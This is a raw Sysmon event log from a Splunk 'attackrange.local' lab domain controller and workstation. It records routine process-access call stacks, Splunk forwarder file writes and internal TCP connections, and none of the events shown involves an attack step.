07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.474{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.015{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8139130B4D0BDE21A1E25371E551E2A9,SHA256=20D27CF9F38330E2C01C0AB4B9B5BFD041C44015800F38E93F411F57F1A920DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:45.722{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B88F5AD1746AC15E2EEDDD47EF536D02,SHA256=546B488981FBC3416C8311326715BD4E153FDC67721F0AB5F68C38589611E47C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:37.684{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51062-false10.0.1.12-8000- 23542300x80000000000000001049746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:45.025{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A9FC2BB732473568B2571E53DFC599E,SHA256=A6BC9560BAE330D5BB4D59D74DA10C10FC520BFD65267D1F368548E29F5E7C93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:46.753{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B729851ED82331246043E93886C153,SHA256=175CE7FED2459F8E91BD90A8406C41B0FDC9C44DF3AB81D12C5E1ED8C134185E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:46.174{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91AAD4AD3BA80168D6E98CF916C85C49,SHA256=CD6E129B91487215FD81516EF4F2FA7A85F5DED498487E78266B602597E5560A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:47.769{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41182F116D4CFF077D48AF96B58546A9,SHA256=1355EADF0727E30A277AD68E0C7A60167029712DDF5B221B9AE89A46AB39698B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:47.205{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5321F095F760B4E2CCB0A2AC42D30A99,SHA256=8D4265B7B47314418AA41F5EAA7A81722579AAFB14E1F14AECBF74C087B6C40C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:48.785{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B0D16FE3839819054F1859D76ABA08B,SHA256=501899FDAECED36C49CD10235E96DA893AF2F0DD13D1094D65C272B202860871,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.874{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:48.874{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:48.858{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-32D3-60E8-770B-00000000CF01}635610232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-32D3-60E8-770B-00000000CF01}635610232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\nt
dll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE9A2193D363998D25F96C6D771AA221,SHA256=4638AE04A325471D2E30C12E4C031C0CE52812FCEE0E2B967065D09C146975B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:48.370{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57297-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:49.788{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA15DFD0DC63081707385AD8B48A7258,SHA256=3BF2C00B92C5A76500C38EF4AFCBE740DDEC72C1423652C2A8729C8A32BDF37B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:49.905{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075428MD5=D64CBEEFE30A8AF64CBCACC44036ADB0,SHA256=753109728F1FBA47A3BE71347227A7971EEF4CD1780E55331D457409ADD61CDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:49.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26A171AD6256F5924C5F71B4D722BD28,SHA256=5078399A426DCACD3CCF8AFA50105B18D2EE2AAED724F9B756792CD5B07EBB45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:50.790{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=926FC993C3227D79A508BE09D5B0FE53,SHA256=937EBEB8802B9D41C083A55AC8C16BE7F17C57F2EC1E5E13C6845D412C9F6934,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.923{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54A-60EB-4E7D-00000000CF01}9408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.921{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.921{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
